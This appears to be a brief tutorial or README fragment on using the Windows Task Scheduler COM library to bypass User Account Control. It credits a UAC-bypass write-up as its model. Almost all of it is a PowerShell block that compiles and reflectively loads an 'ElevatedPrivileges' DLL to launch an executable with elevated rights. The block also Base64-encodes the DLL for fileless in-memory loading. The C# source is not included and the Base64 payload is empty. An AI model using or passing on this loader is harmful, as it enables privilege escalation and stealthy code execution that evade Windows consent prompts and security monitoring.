By adding the TaskScheduler COM Type Library through the Add References dialog box, you can use any functions provided by the operating system.
This part of the functions is highly inspired by "How to bypass UAC in newer Windows versions".
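```powershell
# Compile ElevatedPrivileges.cs into ElevatedPrivileges.dll (the source references System.Windows.Forms)
Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\ElevatedPrivileges.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "ElevatedPrivileges.dll"

# Load the compiled assembly into the current session from its bytes
[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\ElevatedPrivileges.dll"))

# Call Invoke only if the ElevatedPrivileges type is available in the session
If (([Management.Automation.PSTypeName]'ElevatedPrivileges').Type) { [ElevatedPrivileges]::Invoke("C:\ScheduledTask\ScheduledTask.exe") }

# Encode the DLL as a Base64 string
[Convert]::ToBase64String((Get-Content -Path .\ElevatedPrivileges.dll -Encoding Byte))

# Load the assembly from a Base64 string and discard the output
[Reflection.Assembly]::Load([Convert]::FromBase64String("")) | Out-Null
```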